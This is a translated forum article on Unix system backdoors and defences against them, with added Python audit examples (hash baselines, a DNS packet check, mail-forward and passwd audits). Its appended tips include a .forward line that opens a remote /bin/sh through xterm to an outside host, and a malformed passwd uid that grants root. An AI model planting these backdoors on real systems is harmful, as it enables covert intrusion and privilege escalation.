µ±Ç°Î»ÖãºLinux½Ì³Ì - Linux - ¹ØÓÚϵͳºóÃÅ(2)

About system backdoors (2)



    Windows NT

    Because Windows NT does not easily allow many users to access a single machine the way Unix does, it is much harder for an intruder to break into Windows NT, install a backdoor, and launch attacks from there. You will therefore see far more network attacks coming from Unix systems. As Windows NT gains multi-user capabilities, intruders will make use of Windows NT more and more. If that day comes, many Unix backdoor techniques will be ported to Windows NT, and administrators can prepare for the intruders' arrival. Today Windows NT already has telnet daemons. Intruders have found that network-traffic backdoors are feasible to install on Windows NT. (Original: "With Network Traffic backdoors, they are very feasible for intruders to install on Windows NT." How should this be translated? :( )

    Solutions

    The more advanced backdoor techniques become, the harder it is for administrators to determine whether an intruder has broken in, or whether the intruder has been successfully shut out.

    Assessment

    The first thing to do is to actively and accurately assess how vulnerable your network is, so that the holes that exist can be identified and fixed. Many commercial tools help scan and audit networks and systems for vulnerabilities. Many companies would greatly improve their security simply by installing their vendors' security patches.

    MD5 baselines

    An important part of a system (security) scan is an MD5 checksum baseline. The MD5 baseline is built from a clean system before any intruder gets in. If the baseline is built after an intruder has broken in and installed a backdoor, the backdoor is merged into the baseline as well. Some companies have been compromised and had backdoors on their systems for months, so all of their system backups contained the backdoors. When such a company discovers the intruder and turns to its backups to get rid of the backdoor, the effort is wasted, because restoring the system also restores the backdoor. The baseline must be established before an intrusion happens.
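    The baseline-and-compare workflow described above, as an added example (not code from the article): hash every file under a tree on a known-clean system, keep the result somewhere the host cannot rewrite, and later diff a fresh snapshot against it. The article speaks of MD5; the example uses SHA-256 because MD5 collisions are practical today, but the baseline logic is identical for either digest. The directory contents in demo() are constructed.

```python
"""Build a hash baseline of a clean file tree and diff a later snapshot against it."""
import hashlib
import json
import os
import tempfile
from pathlib import Path


def hash_file(path: Path, algo: str = "sha256") -> str:
    """Digest a file in 64 KiB chunks so large binaries need not fit in memory."""
    h = hashlib.new(algo)
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path, algo: str = "sha256") -> dict:
    """Map every regular file under root (path relative to root) to its digest."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            if p.is_file() and not p.is_symlink():
                baseline[str(p.relative_to(root))] = hash_file(p, algo)
    return baseline


def compare_baseline(baseline: dict, current: dict) -> dict:
    """Report files whose digest changed, files that appeared, and files that vanished."""
    return {
        "modified": sorted(k for k in baseline if k in current and baseline[k] != current[k]),
        "added": sorted(k for k in current if k not in baseline),
        "removed": sorted(k for k in baseline if k not in current),
    }


def demo() -> dict:
    """Constructed scenario: baseline a tiny 'system', then change it and diff."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "bin" / "login").write_bytes(b"original login binary\n")
        (root / "etc").mkdir()
        (root / "etc" / "passwd").write_bytes(b"root:x:0:0:root:/root:/bin/sh\n")

        # The baseline is serialized here to stand in for off-host storage:
        # a baseline kept on the same box can be edited along with the files.
        stored = json.dumps(build_baseline(root))

        # Simulated tampering after the baseline was taken.
        (root / "bin" / "login").write_bytes(b"replaced login binary\n")
        (root / "etc" / "new.conf").write_bytes(b"unexpected file\n")
        return compare_baseline(json.loads(stored), build_baseline(root))


if __name__ == "__main__":
    print(demo())
```

    The report lists "bin/login" as modified and "etc/new.conf" as added; a backup taken after the tampering would, as the article warns, preserve both.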

    Intrusion detection

    As organizations go online and allow connections to some of their machines, intrusion detection is becoming more and more important. In the past most intrusion detection techniques were log-based. The newest intrusion detection system (IDS) technology is based on real-time sniffing and security analysis of network traffic. The latest IDS technology can inspect DNS UDP packets and determine whether they conform to the DNS protocol's request format. If the data does not conform to the protocol, it raises an alert and captures the data for further analysis. The same principle can be applied to ICMP packets: check whether the data meets the protocol's requirements, or whether it is carrying an encrypted shell session.
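    The DNS conformance check described above, as an added example (not code from the article or from any IDS product): check_dns_message() validates the bytes of a UDP/53 datagram against the RFC 1035 message layout and returns a list of findings, empty when the payload is well-formed. The two sample payloads are constructed: a normal A query, and an SSH-style banner sent to the DNS port, which is what a shell session hiding on port 53 would look like.

```python
"""Flag UDP/53 payloads that do not obey the DNS message format (RFC 1035, section 4)."""
import struct

VALID_QCLASSES = {1, 3, 4, 255}   # IN, CH, HS, ANY
MAX_OPCODE = 5                    # QUERY, IQUERY, STATUS, reserved, NOTIFY, UPDATE


def _parse_name(data: bytes, offset: int):
    """Walk a label-encoded name; return (name, next_offset) or raise ValueError."""
    labels, total = [], 0
    while True:
        if offset >= len(data):
            raise ValueError("name runs past end of message")
        length = data[offset]
        offset += 1
        if length == 0:
            break
        if length & 0xC0 == 0xC0:
            # A pointer can only refer back to an earlier name; the first question
            # has nothing to point at, so treat it as malformed here.
            raise ValueError("compression pointer in question name")
        if length & 0xC0:
            raise ValueError(f"reserved label type 0x{length & 0xC0:02x}")
        # With the top two bits clear the label is at most 63 octets, as required.
        total += length + 1
        if total > 255:
            raise ValueError("name longer than 255 octets")
        label = data[offset:offset + length]
        if len(label) != length:
            raise ValueError("truncated label")
        labels.append(label.decode("ascii", "replace"))
        offset += length
    return ".".join(labels), offset


def check_dns_message(payload: bytes) -> list:
    """Return a list of protocol violations; an empty list means the payload looks like DNS."""
    if len(payload) < 12:
        return ["shorter than the 12-byte DNS header"]
    _ident, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", payload[:12])
    findings = []
    qr = flags >> 15
    opcode = (flags >> 11) & 0xF
    if opcode > MAX_OPCODE:
        findings.append(f"unassigned opcode {opcode}")
    if flags & 0x0040:
        findings.append("reserved Z bit set")
    if qr == 0 and qd == 0:
        findings.append("query with no question")
    if qr == 0 and (an or ns):
        findings.append("query carrying answer/authority records")
    offset = 12
    for i in range(qd):
        try:
            name, offset = _parse_name(payload, offset)
        except ValueError as exc:
            findings.append(f"question {i}: {exc}")
            return findings          # later fields cannot be located reliably
        if offset + 4 > len(payload):
            findings.append(f"question {i}: missing QTYPE/QCLASS")
            return findings
        qtype, qclass = struct.unpack_from("!HH", payload, offset)
        offset += 4
        if qtype == 0:
            findings.append(f"question {i} ({name}): QTYPE 0 is reserved")
        if qclass not in VALID_QCLASSES:
            findings.append(f"question {i} ({name}): unexpected QCLASS {qclass}")
    if an == ns == ar == 0 and offset != len(payload):
        findings.append(f"{len(payload) - offset} trailing bytes after the question section")
    return findings


# Constructed samples: a recursive A query for www.example.com, and a non-DNS payload.
GOOD_QUERY = (struct.pack("!HHHHHH", 0x1234, 0x0100, 1, 0, 0, 0)
              + b"\x03www\x07example\x03com\x00" + struct.pack("!HH", 1, 1))
NOT_DNS = b"SSH-2.0-OpenSSH_8.9\r\n"


def demo() -> dict:
    return {"good": check_dns_message(GOOD_QUERY), "bad": check_dns_message(NOT_DNS)}


if __name__ == "__main__":
    for label, findings in demo().items():
        print(label, "->", findings or "conforms")
```

    In a sensor this check runs on each datagram to or from port 53 and the findings become the alert text; the payload itself is kept for the follow-up analysis the article mentions.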

    Booting from CD-ROM

    Some administrators consider booting from CD-ROM, which removes the possibility of an intruder placing a backdoor on the CD-ROM. The problem with this approach is the cost and time it takes to implement, which enterprises have to weigh.

    Vigilance

    Because the security field changes so fast, with new vulnerabilities published every day while intruders keep devising new attack and backdoor techniques, there is no security technology that lets you rest easy. Remember: there is no simple defense, only unrelenting effort! (Original: "Be aware that no defense is foolproof, and that there is no substitute for diligent attention." How should this sentence be translated? :( )

    -------------------------------------------------------------------------

    you may want to add:

    .forward Backdoor

    On Unix machines, placing commands into the .forward file was also a common method of regaining access. For the account "username" a .forward file might be constructed as follows:

    username |"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"

    Permutations of this method include alteration of the system's mail aliases file (most commonly located at /etc/aliases). Note that this is a simple permutation; the more advanced can run a simple script from the forward file that can take arbitrary commands via stdin (after minor preprocessing).

    PS: The above method is also useful for gaining access to a company's mailhub (assuming there is a shared home directory FS on the client and server).

    > Using smrsh can effectively negate this backdoor (although it's quite possibly still a problem if you allow things like elm's filter or procmail which can run programs themselves...).

    ( I do not understand this passage well, so I have included the English text; please advise! )
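    A way to audit for the .forward and /etc/aliases pipe deliveries discussed above, as an added example (not code from the article or from sendmail): the two parsers list every "|program" entry and report whether the program would pass an smrsh-style restriction, where any leading path is stripped and the bare name must be one the administrator placed in the restricted directory. ALLOWED_PROGRAMS stands in for that directory's contents and is an assumption; the aliases excerpt is constructed, and the .forward content is the article's own example.

```python
"""List pipe-to-program deliveries in .forward and aliases files and check them against an smrsh-style allow list."""
import os
from dataclasses import dataclass

# Assumed contents of the smrsh program directory on this host (constructed).
ALLOWED_PROGRAMS = {"procmail", "vacation"}


@dataclass
class PipeDelivery:
    source: str    # ".forward" or the alias name
    command: str   # everything after the '|'
    program: str   # first word of the command
    allowed: bool  # basename found in the restricted directory


def _split_targets(text: str) -> list:
    """Split a delivery list on commas outside quotes, dropping the quote characters."""
    targets, buf, quote = [], [], None
    for ch in text:
        if quote:
            if ch == quote:
                quote = None
            else:
                buf.append(ch)
        elif ch in "\"'":
            quote = ch
        elif ch == ",":
            targets.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    targets.append("".join(buf).strip())
    return [t for t in targets if t]


def _classify(source: str, target: str, allowed: set):
    """Turn a '|command' target into a PipeDelivery; other targets return None."""
    if not target.startswith("|"):
        return None
    command = target[1:].strip()
    words = command.split()
    program = words[0] if words else ""
    # smrsh strips the path and looks the bare name up in its own directory.
    return PipeDelivery(source, command, program, os.path.basename(program) in allowed)


def _is_skippable(line: str) -> bool:
    return not line.strip() or line.lstrip().startswith("#")


def audit_forward(text: str, allowed: set = ALLOWED_PROGRAMS) -> list:
    """Pipe deliveries in a .forward file (one or more targets per line)."""
    found = []
    for line in text.splitlines():
        if _is_skippable(line):
            continue
        for target in _split_targets(line):
            delivery = _classify(".forward", target, allowed)
            if delivery:
                found.append(delivery)
    return found


def audit_aliases(text: str, allowed: set = ALLOWED_PROGRAMS) -> list:
    """Pipe deliveries in an aliases file; indented lines continue the previous alias."""
    records = []
    for line in text.splitlines():
        if _is_skippable(line):
            continue
        if line[0].isspace() and records:
            records[-1] += " " + line.strip()
        else:
            records.append(line.rstrip())
    found = []
    for rec in records:
        name, sep, rhs = rec.partition(":")
        if not sep:
            continue
        for target in _split_targets(rhs):
            delivery = _classify(name.strip(), target, allowed)
            if delivery:
                found.append(delivery)
    return found


# The article's .forward example, written as a two-entry file.
FORWARD_SAMPLE = r"""\username
"|/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"
"""

# Constructed /etc/aliases excerpt.
ALIASES_SAMPLE = """# constructed sample
postmaster: root
support: "|/usr/bin/procmail -m /etc/procmailrcs/support"
ops: "|/usr/local/bin/ticketd",
     ops-archive
"""

if __name__ == "__main__":
    for d in audit_forward(FORWARD_SAMPLE) + audit_aliases(ALIASES_SAMPLE):
        print(f"{d.source}: {d.command}  allowed={d.allowed}")
```

    The xterm entry and the ticketd alias are reported as not allowed; procmail passes the allow list, which illustrates the caveat in the quoted reply: a program that is itself permitted to run other programs must be reviewed on its own terms.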

    ---------------------------------------------------------------------------

    You might also be able to use this "feature" as a backdoor:

    When an invalid uid/gid is written into /etc/passwd, most login(1) implementations fail to detect the bad uid/gid, and atoi(3) turns it into 0, which grants superuser privileges.
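    An added example (not code from the article) of why this works and how to audit for it: atoi_like() models what C's atoi(3) does with a field such as "x50", stopping at the first non-digit and returning 0, while parse_passwd_line() rejects any uid/gid that is not a pure decimal number. audit_passwd() runs the strict parser over a file and also reports any uid-0 account other than root. The sample file is constructed around the rmartin line the article gives as its example.

```python
"""Strict uid/gid parsing for passwd(5) lines, beside a model of atoi(3)'s lenient behaviour."""
import re

_DECIMAL = re.compile(r"^[0-9]+$")


def atoi_like(field: str) -> int:
    """Python model of C atoi(): skip whitespace, optional sign, digits until the first non-digit, else 0."""
    s = field.lstrip()
    sign = 1
    if s and s[0] in "+-":
        sign = -1 if s[0] == "-" else 1
        s = s[1:]
    digits = ""
    for ch in s:
        if not ("0" <= ch <= "9"):
            break
        digits += ch
    return sign * int(digits) if digits else 0


def parse_passwd_line(line: str) -> dict:
    """Parse one passwd(5) line; raise ValueError on a bad field count or non-numeric uid/gid."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != 7:
        raise ValueError(f"expected 7 fields, got {len(fields)}")
    name, _pw, uid, gid, _gecos, home, shell = fields
    for label, value in (("uid", uid), ("gid", gid)):
        if not _DECIMAL.match(value):
            raise ValueError(f"{label} {value!r} is not a decimal number")
    return {"name": name, "uid": int(uid), "gid": int(gid), "home": home, "shell": shell}


def audit_passwd(text: str) -> list:
    """Return (line_number, problem) for lines the strict parser rejects and for non-root uid-0 accounts."""
    problems = []
    for number, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        try:
            entry = parse_passwd_line(line)
        except ValueError as exc:
            problems.append((number, str(exc)))
            continue
        if entry["uid"] == 0 and entry["name"] != "root":
            problems.append((number, f"{entry['name']} has uid 0"))
    return problems


# Constructed passwd excerpt; line 3 is the article's example.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh
toor:x:0:0:second root:/root:/bin/sh
"""

if __name__ == "__main__":
    print("atoi-style uid for 'x50':", atoi_like("x50"))
    for number, problem in audit_passwd(SAMPLE_PASSWD):
        print(f"line {number}: {problem}")
```

    The lenient model yields 0 for "x50", which is the whole problem; the strict audit reports the rmartin line as malformed and the toor line as a second uid-0 account, both of which belong in the MD5-baseline comparison as well.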

    Example:

    rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh

    On Linux this sets user rmartin's uid to 0.

    Copyright belongs to the author. If you repost this article, please keep it intact. 绿色兵团 (Green Army) http://i.am/hack1/

    Translated by iamtheguest
    Posted by: Crystal    From: 中国超级unix联盟 (China Super Unix Alliance)